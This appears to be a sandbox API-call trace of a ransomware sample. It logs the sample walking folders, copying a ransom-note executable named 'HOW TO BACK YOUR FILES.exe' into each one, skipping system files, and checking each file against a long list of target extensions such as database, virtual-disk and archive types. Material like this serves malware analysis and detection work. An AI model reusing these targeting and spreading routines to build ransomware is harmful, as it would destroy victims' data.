lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.106] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.106] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.106] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.106] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 80 [0042.106] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.106] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.120] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.120] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.120] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.120] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.120] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.120] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.120] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.120] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="00010C6E", cAlternateFileName="")) returned 1 [0042.120] lstrcmpiW (lpString1="00010C6E", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="aoldtz.exe") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2=".") returned 1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="..") returned 1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="windows") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="bootmgr") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="temp") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="pagefile.sys") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="boot") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="ids.txt") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="ntuser.dat") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="perflogs") returned -1 [0042.121] lstrcmpiW (lpString1="00010C6E", lpString2="MSBuild") returned -1 [0042.121] lstrlenW (lpString="00010C6E") returned 8 [0042.121] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned 82 [0042.121] lstrcpyW (in: lpString1=0x2e2e902, lpString2="00010C6E" | out: lpString1="00010C6E") returned="00010C6E" [0042.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f2fc8 [0042.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.121] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.121] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.121] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.121] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.121] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.121] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0042.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.121] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 89 [0042.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.127] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.127] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.127] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.127] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.127] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.127] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.127] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.127] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.127] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.128] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.128] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="aoldtz.exe") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".") returned 1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="..") returned 1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="windows") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="bootmgr") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="temp") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="pagefile.sys") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="boot") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="ids.txt") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="ntuser.dat") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="perflogs") returned -1 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="MSBuild") returned -1 [0042.128] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0042.128] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 91 [0042.128] lstrcpyW (in: lpString1=0x2e2e914, lpString2="01_Music_auto_rated_at_5_stars.wpl" | out: lpString1="01_Music_auto_rated_at_5_stars.wpl") returned="01_Music_auto_rated_at_5_stars.wpl" [0042.128] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0042.128] lstrlenW (lpString="Ares865") returned 7 [0042.128] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.128] lstrlenW (lpString=".dll") returned 4 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".dll") returned 1 [0042.128] lstrlenW (lpString=".lnk") returned 4 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".lnk") returned 1 [0042.128] lstrlenW (lpString=".ini") returned 4 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".ini") returned 1 [0042.128] lstrlenW (lpString=".sys") returned 4 [0042.128] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2=".sys") returned 1 [0042.128] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0042.128] lstrlenW (lpString="bak") returned 3 [0042.128] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0042.128] lstrlenW (lpString="ba_") returned 3 [0042.128] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0042.128] lstrlenW (lpString="dbb") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0042.129] lstrlenW (lpString="vmdk") returned 4 [0042.129] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0042.129] lstrlenW (lpString="rar") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0042.129] lstrlenW (lpString="zip") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0042.129] lstrlenW (lpString="tgz") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0042.129] lstrlenW (lpString="vbox") returned 4 [0042.129] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0042.129] lstrlenW (lpString="vdi") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0042.129] lstrlenW (lpString="vhd") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0042.129] lstrlenW (lpString="vhdx") returned 4 [0042.129] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0042.129] lstrlenW (lpString="avhd") returned 4 [0042.129] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0042.129] lstrlenW (lpString="db") returned 2 [0042.129] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0042.129] lstrlenW (lpString="db2") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0042.129] lstrlenW (lpString="db3") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0042.129] lstrlenW (lpString="dbf") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0042.129] lstrlenW (lpString="mdf") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0042.129] lstrlenW (lpString="mdb") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0042.129] lstrlenW (lpString="sql") returned 3 [0042.129] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0042.129] lstrlenW (lpString="sqlite") returned 6 [0042.129] lstrcmpiW (lpString1="rs.wpl", lpString2="sqlite") returned -1 [0042.130] lstrlenW (lpString="sqlite3") returned 7 [0042.130] lstrcmpiW (lpString1="ars.wpl", lpString2="sqlite3") returned -1 [0042.130] lstrlenW (lpString="sqlitedb") returned 8 [0042.130] lstrcmpiW (lpString1="tars.wpl", lpString2="sqlitedb") returned 1 [0042.130] lstrlenW (lpString="xml") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0042.130] lstrlenW (lpString="$er") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0042.130] lstrlenW (lpString="4dd") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0042.130] lstrlenW (lpString="4dl") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0042.130] lstrlenW (lpString="^^^") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0042.130] lstrlenW (lpString="abs") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0042.130] lstrlenW (lpString="abx") returned 3 [0042.130] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0042.130] lstrlenW (lpString="accdb") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accdb") returned 1 [0042.130] lstrlenW (lpString="accdc") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accdc") returned 1 [0042.130] lstrlenW (lpString="accde") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accde") returned 1 [0042.130] lstrlenW (lpString="accdr") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accdr") returned 1 [0042.130] lstrlenW (lpString="accdt") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accdt") returned 1 [0042.130] lstrlenW (lpString="accdw") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accdw") returned 1 [0042.130] lstrlenW (lpString="accft") returned 5 [0042.130] lstrcmpiW (lpString1="s.wpl", lpString2="accft") returned 1 [0042.130] lstrlenW (lpString="adb") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0042.131] lstrlenW (lpString="adb") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0042.131] lstrlenW (lpString="ade") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0042.131] lstrlenW (lpString="adf") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0042.131] lstrlenW (lpString="adn") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0042.131] lstrlenW (lpString="adp") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0042.131] lstrlenW (lpString="alf") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0042.131] lstrlenW (lpString="ask") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0042.131] lstrlenW (lpString="btr") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0042.131] lstrlenW (lpString="cat") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0042.131] lstrlenW (lpString="cdb") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0042.131] lstrlenW (lpString="ckp") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0042.131] lstrlenW (lpString="cma") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0042.131] lstrlenW (lpString="cpd") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0042.131] lstrlenW (lpString="dacpac") returned 6 [0042.131] lstrcmpiW (lpString1="rs.wpl", lpString2="dacpac") returned 1 [0042.131] lstrlenW (lpString="dad") returned 3 [0042.131] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0042.131] lstrlenW (lpString="dadiagrams") returned 10 [0042.131] lstrcmpiW (lpString1="_stars.wpl", lpString2="dadiagrams") returned -1 [0042.131] lstrlenW (lpString="daschema") returned 8 [0042.131] lstrcmpiW (lpString1="tars.wpl", lpString2="daschema") returned 1 [0042.132] lstrlenW (lpString="db-journal") returned 10 [0042.132] lstrcmpiW (lpString1="_stars.wpl", lpString2="db-journal") returned -1 [0042.132] lstrlenW (lpString="db-shm") returned 6 [0042.132] lstrcmpiW (lpString1="rs.wpl", lpString2="db-shm") returned 1 [0042.132] lstrlenW (lpString="db-wal") returned 6 [0042.132] lstrcmpiW (lpString1="rs.wpl", lpString2="db-wal") returned 1 [0042.132] lstrlenW (lpString="dbc") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0042.132] lstrlenW (lpString="dbs") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0042.132] lstrlenW (lpString="dbt") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0042.132] lstrlenW (lpString="dbv") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0042.132] lstrlenW (lpString="dbx") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0042.132] lstrlenW (lpString="dcb") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0042.132] lstrlenW (lpString="dct") returned 3 [0042.132] lstrcmpiW (lpString1="wpl", lpString2="dct") returned 1 [0042.133] lstrlenW (lpString="dcx") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dcx") returned 1 [0042.133] lstrlenW (lpString="ddl") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="ddl") returned 1 [0042.133] lstrlenW (lpString="dlis") returned 4 [0042.133] lstrcmpiW (lpString1=".wpl", lpString2="dlis") returned -1 [0042.133] lstrlenW (lpString="dp1") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dp1") returned 1 [0042.133] lstrlenW (lpString="dqy") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dqy") returned 1 [0042.133] lstrlenW (lpString="dsk") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dsk") returned 1 [0042.133] lstrlenW (lpString="dsn") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dsn") returned 1 [0042.133] lstrlenW (lpString="dtsx") returned 4 [0042.133] lstrcmpiW (lpString1=".wpl", lpString2="dtsx") returned -1 [0042.133] lstrlenW (lpString="dxl") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="dxl") returned 1 [0042.133] lstrlenW (lpString="eco") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="eco") returned 1 [0042.133] lstrlenW (lpString="ecx") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="ecx") returned 1 [0042.133] lstrlenW (lpString="edb") returned 3 [0042.133] lstrcmpiW (lpString1="wpl", lpString2="edb") returned 1 [0042.133] lstrlenW (lpString="epim") returned 4 [0042.133] lstrcmpiW (lpString1=".wpl", lpString2="epim") returned -1 [0042.134] lstrlenW (lpString="fcd") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fcd") returned 1 [0042.134] lstrlenW (lpString="fdb") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fdb") returned 1 [0042.134] lstrlenW (lpString="fic") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fic") returned 1 [0042.134] lstrlenW (lpString="flexolibrary") returned 12 [0042.134] lstrcmpiW (lpString1="_5_stars.wpl", lpString2="flexolibrary") returned -1 [0042.134] lstrlenW (lpString="fm5") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fm5") returned 1 [0042.134] lstrlenW (lpString="fmp") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fmp") returned 1 [0042.134] lstrlenW (lpString="fmp12") returned 5 [0042.134] lstrcmpiW (lpString1="s.wpl", lpString2="fmp12") returned 1 [0042.134] lstrlenW (lpString="fmpsl") returned 5 [0042.134] lstrcmpiW (lpString1="s.wpl", lpString2="fmpsl") returned 1 [0042.134] lstrlenW (lpString="fol") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fol") returned 1 [0042.134] lstrlenW (lpString="fp3") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fp3") returned 1 [0042.134] lstrlenW (lpString="fp4") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fp4") returned 1 [0042.134] lstrlenW (lpString="fp5") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fp5") returned 1 [0042.134] lstrlenW (lpString="fp7") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fp7") returned 1 [0042.134] lstrlenW (lpString="fpt") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="fpt") returned 1 [0042.134] lstrlenW (lpString="frm") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="frm") returned 1 [0042.134] lstrlenW (lpString="gdb") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0042.134] lstrlenW (lpString="gdb") returned 3 [0042.134] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0042.134] lstrlenW (lpString="grdb") returned 4 [0042.135] lstrcmpiW (lpString1=".wpl", lpString2="grdb") returned -1 [0042.135] lstrlenW (lpString="gwi") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="gwi") returned 1 [0042.135] lstrlenW (lpString="hdb") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="hdb") returned 1 [0042.135] lstrlenW (lpString="his") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="his") returned 1 [0042.135] lstrlenW (lpString="ib") returned 2 [0042.135] lstrcmpiW (lpString1="pl", lpString2="ib") returned 1 [0042.135] lstrlenW (lpString="idb") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="idb") returned 1 [0042.135] lstrlenW (lpString="ihx") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="ihx") returned 1 [0042.135] lstrlenW (lpString="itdb") returned 4 [0042.135] lstrcmpiW (lpString1=".wpl", lpString2="itdb") returned -1 [0042.135] lstrlenW (lpString="itw") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="itw") returned 1 [0042.135] lstrlenW (lpString="jet") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="jet") returned 1 [0042.135] lstrlenW (lpString="jtx") returned 3 [0042.135] lstrcmpiW (lpString1="wpl", lpString2="jtx") returned 1 [0042.135] 